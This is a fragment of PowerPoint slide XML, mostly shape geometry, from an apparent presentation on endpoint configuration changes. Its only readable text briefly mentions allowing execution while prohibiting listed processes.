                  <a:lnTo>
                    <a:pt x="1825815" y="75247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787067" y="49339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744967" y="28422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1699971" y="12928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652498" y="3314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602994" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="23114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602994" y="23114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648904" y="26187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693049" y="35140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734985" y="49555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774304" y="69037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1810562" y="93179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843366" y="121589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872272" y="153860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1896872" y="189598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916747" y="228384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931454" y="269811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940585" y="313499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943735" y="359029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943735" y="3375660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967484" y="3375660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967484" y="359029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="313E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506211" y="4981955"/>
              <a:ext cx="862965" cy="844550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="862964" h="844550">
                  <a:moveTo>
                    <a:pt x="431291" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384288" y="2476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338752" y="9735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294948" y="21518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253138" y="37569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213585" y="57629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176552" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142301" y="108750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111095" y="139295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83198" y="172821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58871" y="209070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38378" y="247784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21982" y="288706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9945" y="331579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="376145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="468150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9945" y="512716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21982" y="555589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38378" y="596511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58871" y="635225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83198" y="671474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111095" y="705000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142301" y="735545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176552" y="762853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213585" y="786666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253138" y="806726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294948" y="822777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338752" y="834560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384288" y="841819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431291" y="844296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478295" y="841819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523831" y="834560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567635" y="822777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609445" y="806726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648998" y="786666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686031" y="762853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720282" y="735545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751488" y="705000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779385" y="671474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803712" y="635225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824205" y="596511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840601" y="555589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852638" y="512716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860053" y="468150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862584" y="422148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860053" y="376145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852638" y="331579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840601" y="288706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824205" y="247784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803712" y="209070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779385" y="172821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751488" y="139295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720282" y="108750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686031" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648998" y="57629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609445" y="37569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567635" y="21518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523831" y="9735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478295" y="2476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431291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747003" y="6754367"/>
              <a:ext cx="861060" cy="841375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="861059" h="841375">
                  <a:moveTo>
                    <a:pt x="430530" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="383624" y="2468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338180" y="9702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294461" y="21445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252729" y="37441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213247" y="57432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176278" y="81162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142084" y="108374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110929" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83076" y="172218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58786" y="208336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38324" y="246910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21951" y="287682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9931" y="330396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526" y="374796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="420623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526" y="466451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9931" y="510851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21951" y="553565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38324" y="594337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58786" y="632911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83076" y="669029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110929" y="702436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142084" y="732873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176278" y="760085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213247" y="783815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252729" y="803806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294461" y="819802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338180" y="831545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383624" y="838779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430530" y="841247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477435" y="838779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522879" y="831545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566598" y="819802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608330" y="803806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="783815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684781" y="760085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718975" y="732873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750130" y="702436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777983" y="669029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802273" y="632911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822735" y="594337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839108" y="553565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851128" y="510851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="858533" y="466451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861060" y="420623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="858533" y="374796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851128" y="330396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839108" y="287682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822735" y="246910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802273" y="208336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777983" y="172218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750130" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718975" y="108374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684781" y="81162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="57432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608330" y="37441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566598" y="21445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522879" y="9702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477435" y="2468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430530" y="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35723" y="5321807"/>
              <a:ext cx="164592" cy="16459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12508" y="7138416"/>
              <a:ext cx="170688" cy="16763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0897616" y="7179309"/>
            <a:ext cx="30924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05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790303" y="5403545"/>
            <a:ext cx="30924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04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994650" y="3806189"/>
            <a:ext cx="30924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03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784341" y="5231968"/>
            <a:ext cx="30924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02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023864" y="7014718"/>
            <a:ext cx="30924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01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49671" y="306451"/>
            <a:ext cx="575437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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changes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20084" y="760476"/>
            <a:ext cx="8999219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768220" y="2822829"/>
            <a:ext cx="12563475" cy="1644014"/>
            <a:chOff x="1768220" y="2822829"/>
            <a:chExt cx="12563475" cy="1644014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1789937" y="2832354"/>
              <a:ext cx="6367780" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="638810">
                  <a:moveTo>
                    <a:pt x="6260845" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106425" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64990" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31162" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8360" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6358911" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6336109" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6302281" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6260845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789937" y="2832354"/>
              <a:ext cx="6367780" cy="638810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="638810">
                  <a:moveTo>
                    <a:pt x="106425" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6260845" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6302281" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6336109" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6358911" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="638556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8360" y="64990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31162" y="31162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64990" y="8360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106425" y="0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777745" y="3321558"/>
              <a:ext cx="12544425" cy="1135380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1135379">
                  <a:moveTo>
                    <a:pt x="12450698" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93345" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1042034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="1078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="1108043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="1128045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93345" y="1135379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12450698" y="1135379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487036" y="1128045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516707" y="1108043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536709" y="1078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1042034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="93344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536709" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516707" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487036" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124506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777745" y="3321558"/>
              <a:ext cx="12544425" cy="1135380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1135379">
                  <a:moveTo>
                    <a:pt x="0" y="93344"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7334" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93345" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12450698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487036" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516707" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536709" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="93344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1042034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536709" y="1078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516707" y="1108043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487036" y="1128045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12450698" y="1135379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93345" y="1135379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="1128045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="1108043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="1078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1042034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93344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705973" y="3636264"/>
              <a:ext cx="35560" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="35559" h="381000">
                  <a:moveTo>
                    <a:pt x="35051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35051" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350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1756029" y="4767453"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1756029" y="4767453"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1765554" y="5246370"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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765554" y="5246370"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772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777746" y="4776978"/>
              <a:ext cx="6367780" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="469900">
                  <a:moveTo>
                    <a:pt x="6289039" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6361120" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344348" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6319480" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6289039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777746" y="4776978"/>
              <a:ext cx="6367780" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6289039" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6319480" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344348" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6361120" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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960879" y="5584952"/>
            <a:ext cx="766699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Allows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execution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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>but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explicitly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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>prohibits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listed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processes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60879" y="4812613"/>
            <a:ext cx="291147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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
